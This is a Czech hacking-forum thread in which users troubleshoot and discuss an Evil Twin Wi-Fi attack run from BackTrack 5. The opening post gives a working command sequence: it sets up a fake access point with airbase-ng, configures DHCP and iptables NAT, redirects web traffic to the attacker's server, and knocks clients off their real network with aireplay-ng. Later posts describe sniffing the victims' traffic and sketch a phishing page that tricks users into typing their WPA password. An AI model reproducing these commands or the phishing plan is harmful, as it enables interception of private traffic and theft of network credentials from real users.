Metoda útoku Evil Twin BackTrack 5 + Virtualbox

Wi-Fi hacking, techniky a aplikace na prolomení zabezpečení bezdrátových sítí. Pentes, hacking Wi-Fi zranitelností, hack firmware, Hacking WLAN
Odpovědět
Uživatelský avatar
ChuckyPC
Level 0
Příspěvky: 4
Registrován: 09 úno 2013, 16:55

09 úno 2013, 17:05

Dobrý den, vytvořím fake Access Point xxx pokud se k němu chci připojit tak to vyhodí chybu že připojení se nezdařilo, proč? Co dělam špatně?
airbase-ng -e "xxx" -c "xxx" -a 00:12:23:34:45:56 mon0
ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
/etc/init.d/dhcp3-server start
iptables --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
start apache
start mysql
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination "my IP"
iptables -t nat -A POSTROUTING -j MASQUERADE
airodump-ng --bssid "xxx" -c "x" mon0
aireplay-ng -0 0 -a bssid -c station mon0 *
* --> po tomto příkazu mi nepůjde stávající připojení, takže se odpojím a chci se připojit k tomu fake AP což ale hodí chybu...

Používam Backtrack 5 R3 ve Virutalboxu. Díky, Chucky

Uživatelský avatar
android
Level 7
Příspěvky: 461
Registrován: 10 říj 2008, 22:48

09 úno 2013, 17:59

Hele.. kde vytvoříš AP a odkud se na něj připojuješ? :D V logu je vidět minimálně 3 rozhraní ale není vůbec patrné oč se jedná..

Uživatelský avatar
ChuckyPC
Level 0
Příspěvky: 4
Registrován: 09 úno 2013, 16:55

08 bře 2013, 17:57

nějak jsem nepochopil na co se vlastně ptáš, nicméně nakonec se mi to nějak podařilo, byla chyba někde v tom dhcp souboru, pravděpodobně spatně sladěný adresy

Uživatelský avatar
android
Level 7
Příspěvky: 461
Registrován: 10 říj 2008, 22:48

11 bře 2013, 12:00

Nebylo by od věci popsat co konkrétně bylo špatně a co vyřešilo tu chybu.. V opačném případě je tohle diskuzní vlákno bezcenné..

Uživatelský avatar
Slop
Level 1
Příspěvky: 26
Registrován: 28 pro 2009, 22:38

02 čer 2013, 11:22

Můžete prosím někdo popsat, co uvidí a co všechno se bude dít u uživatele na druhé straně při vytvoření fakeAP a použití metody Evil Twin? Koukal jsem na videa, ale moc informací z pohledu napadené strany tam není.
Díky

Uživatelský avatar
wire
Level 8
Příspěvky: 696
Registrován: 15 kvě 2007, 22:44
Bydliště: Praha

02 čer 2013, 11:47

Nebude se dít vůbec nic :D Akorát se CL přepojí na nové SSID.. a z pohledu uživatele napadené linky bude fungovat vše jako předtím.. :D

Uživatelský avatar
Slop
Level 1
Příspěvky: 26
Registrován: 28 pro 2009, 22:38

02 čer 2013, 16:57

Podle videí jsem to pochopil tak, že uživatele odpojím od (jeho) Access Pointu, on se manuálně připojí k vytvořenému fakeAP a do webové stránky musí zadat heslo ke své wifi..

Uživatelský avatar
cocaine
Level 7
Příspěvky: 398
Registrován: 29 dub 2008, 23:54
Bydliště: Země Oz

02 čer 2013, 17:03

Nečum na videa :D Ty z 90% točí lidi co neumí rozeznat BCM od AR ;) Ten útok je pouze o jednom jediném.. (to lze chápat už dle iptables rule co máš v prvním příspěvku.. - NATuješ rozhraní). A to.. připojit na sebe člověka a veškerý trafik odposlouchavat (a to tak, že to ženeš ze "vzduchu" na eth0 rozhraní kde je snifr).. Je to to samé jako MITM (man in the middle) útok v LAN.

Pokud je Access Point který chceš "nahradit" šifrovaný.. je potřeba nastavit to samé zabezpečení na fakeAP.. jinak se stávajíci CL na fakeAP nepřipojí..

Na podobné téma byl i článek.. Malá krabička se speciálním OpenWRT firmware.. nevzpomenu si na název.. Možná pozdejc..

Uživatelský avatar
fcga
Level 1
Příspěvky: 28
Registrován: 21 dub 2009, 11:53
Bydliště: Bratislava

02 čer 2013, 17:16

Jasager Karma + LaFonera bro ;) Ten router LaFonera v tom článku robí to samé čo se tu rieši.. Stačí pripojiť UTP kabel do PC a pustiť sniff..

Uživatelský avatar
Slop
Level 1
Příspěvky: 26
Registrován: 28 pro 2009, 22:38

08 čer 2013, 12:05

Njn :( jenže když o tom nic moc nevím, tak z videa se toho dá pochytit nejvíc... a pak teprve pochopím, co jak funguje, proč se co dělá a začne mi to celý dávat smysl.
I když se to snažím naučit, až od Tebe slyším poprvé, že se fake Access Point vytváří se stejným šifrováním...pak mi dává smysl to, co napsal wire: že CL nepozná vůbec nic. Nacházím jen návod s vytvořením nezabezpečeného Access Point :(
Nemáte někdo prosím odkaz, na nějaký návod, postup...??

Uživatelský avatar
cocaine
Level 7
Příspěvky: 398
Registrován: 29 dub 2008, 23:54
Bydliště: Země Oz

08 čer 2013, 12:44

Nikdo nepsal o šifrování na falešném přípojném bodu.. ale o šifrování v případě, že chceš "nahradit" konkrétní přípojný bod :D Samo sebou můžeš provozovat vlastní nezabezpečený přípojný bod s vlastním SSID (třeba FreeNET_spot) a čekat až se někdo připojí..

Uživatelský avatar
Slop
Level 1
Příspěvky: 26
Registrován: 28 pro 2009, 22:38

08 čer 2013, 13:21

Ejjj... moje chyba :( Nenapsal jsem, že bych Evil Twin chtěl použít pro crack WPA, pardon. Když chci Evil Twin použít ke zjištění WPA hesla, nemám na výběr a musím vytvořit nezabezpečený fake Access Point a doufat, že se uživatel připojí a zadá svoje WPA heslo? Kdežto, když znám heslo a chci aby se CL automaticky připojil na mě, vytvořím fake Access Point se stejným šifrováním, kanálem atd...?

Uživatelský avatar
cocaine
Level 7
Příspěvky: 398
Registrován: 29 dub 2008, 23:54
Bydliště: Země Oz

08 čer 2013, 13:56

Tohle jedině jako presměrování na webovou stránku kde bude okénko s popiskou "Zadejte WPA heslo k vaší domácí síti" :D Což by nemusel být až tak špatný nápad.. Otázka je jak chceš uskutečnit přepojení klientské jednotky z šifrovaného access pointu na svůj vysílač :D

Evil Twin ale slouží k přesměrování a odposlechu trafiku..

Uživatelský avatar
Slop
Level 1
Příspěvky: 26
Registrován: 28 pro 2009, 22:38

08 čer 2013, 15:16

Jednoduše...ale neelegantně :( pomocí aireplay-ng -0 odpojovat klienta od access pointu, uživatel si obnoví wifi sítě v dosahu a sám se připojí na nezabezpečený fake access point, zadá svoje WPA heslo a net mu poběží přesměrováním...a já získám heslo. Jenže to je jak otevírat zámek krumpáčem :/

Uživatelský avatar
android
Level 7
Příspěvky: 461
Registrován: 10 říj 2008, 22:48

10 čer 2013, 00:10

Slop a co když klient bude CL jednotka na střeše? :D Ta se nikam jinam než má nepřipojí..

Uživatelský avatar
Slop
Level 1
Příspěvky: 26
Registrován: 28 pro 2009, 22:38

10 čer 2013, 10:33

Když bude klient jednotka na střeše, tak smůla... :/ Nebo je nějaké elegantnější řešení pro crack WPA s vytvořením fakeAP?

Uživatelský avatar
wire
Level 8
Příspěvky: 696
Registrován: 15 kvě 2007, 22:44
Bydliště: Praha

10 čer 2013, 12:20

Jak jinak chceš napsat, že si pleteš jabka s hruškamy? :-D Evil Twin Attack nema žádnou souvislost s prolomením WPA zabezpečení. Jedná se výhradne o zachyceni a potažmo napr. sledování trafiku!

Odesláno z Tapatalk
Ve Fóru používáme diakritiku, než se ptáme čteme nápovědu a pravidla fóra!

Odpovědět
  • Informace
  • Kdo je online

    Uživatelé prohlížející si toto fórum: Žádní registrovaní uživatelé a 1 host